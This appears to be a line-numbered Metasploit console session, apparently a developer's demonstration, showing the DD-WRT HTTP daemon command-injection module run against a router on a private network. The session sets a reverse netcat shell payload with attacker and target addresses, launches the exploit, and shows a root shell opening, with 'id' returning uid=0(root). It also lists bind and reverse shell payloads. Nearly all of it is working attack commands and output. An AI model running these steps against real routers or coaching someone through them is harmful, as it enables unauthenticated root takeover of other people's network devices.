1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
msf3$ svn up
A    modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
Updated to revision 6852.
hdm@vorpal:/downloads/msf19$ ./msfconsole 

                |                    |      _) |   
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __| 
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |   
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| 
                              _|                   


       =[ msf v3.3-dev
+ -- --=[ 401 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 176 aux

msf > use exploit/linux/http/ddwrt_cgibin_exec 
msf exploit(ddwrt_cgibin_exec) > info 

       Name: DD-WRT HTTP Daemon Arbitrary Command Execution
    Version: 6852
   Platform: Unix
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  hdm <[email protected]>

Available targets:
  Id  Name              
  --  ----              
  0   Automatic Target  

Basic options:
  Name   Current Setting  Required  Description         
  ----   ---------------  --------  -----------         
  RHOST  192.168.0.10     yes       The target address  
  RPORT  80               yes       The target port     

Payload information:
  Space: 1024

Description:
  This module abuses a metacharacter injection vulnerability in the 
  HTTP management server of wireless gateways running DD-WRT. This 
  flaw allows an unauthenticated attacker to execute arbitrary 
  commands as the root user account.

References:
  http://www.securityfocus.com/bid/35742
  http://www.milw0rm.com/exploits/9209

msf exploit(ddwrt_cgibin_exec) > show payloads 

Compatible payloads
===================

   Name                       Description                                      
   ----                       -----------                                      
   cmd/unix/bind_netcat       Unix Command Shell, Bind TCP (via netcat -e)     
   cmd/unix/bind_perl         Unix Command Shell, Bind TCP (via perl)          
   cmd/unix/bind_ruby         Unix Command Shell, Bind TCP (via Ruby)          
   cmd/unix/generic           Unix Command, Generic command execution          
   cmd/unix/reverse           Unix Command Shell, Double reverse TCP (telnet)  
   cmd/unix/reverse_bash      Unix Command Shell, Reverse TCP (/dev/tcp)       
   cmd/unix/reverse_netcat    Unix Command Shell, Reverse TCP (via netcat -e)  
   cmd/unix/reverse_perl      Unix Command Shell, Reverse TCP (via perl)       
   cmd/unix/reverse_ruby      Unix Command Shell, Reverse TCP (via Ruby)       
   generic/shell_bind_tcp     Generic Command Shell, Bind TCP Inline           
   generic/shell_reverse_tcp  Generic Command Shell, Reverse TCP Inline        

msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.0.139 
LHOST => 192.168.0.139
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444 
LPORT => 4444
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.0.10
RHOST => 192.168.0.10
msf exploit(ddwrt_cgibin_exec) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 1 opened (192.168.0.139:4444 -> 192.168.0.10:2057)

id
uid=0(root) gid=0(root)
uname -a
Linux wifi1 2.4.36 #308 Sun Jul 27 16:11:05 CEST 2008 mips unknown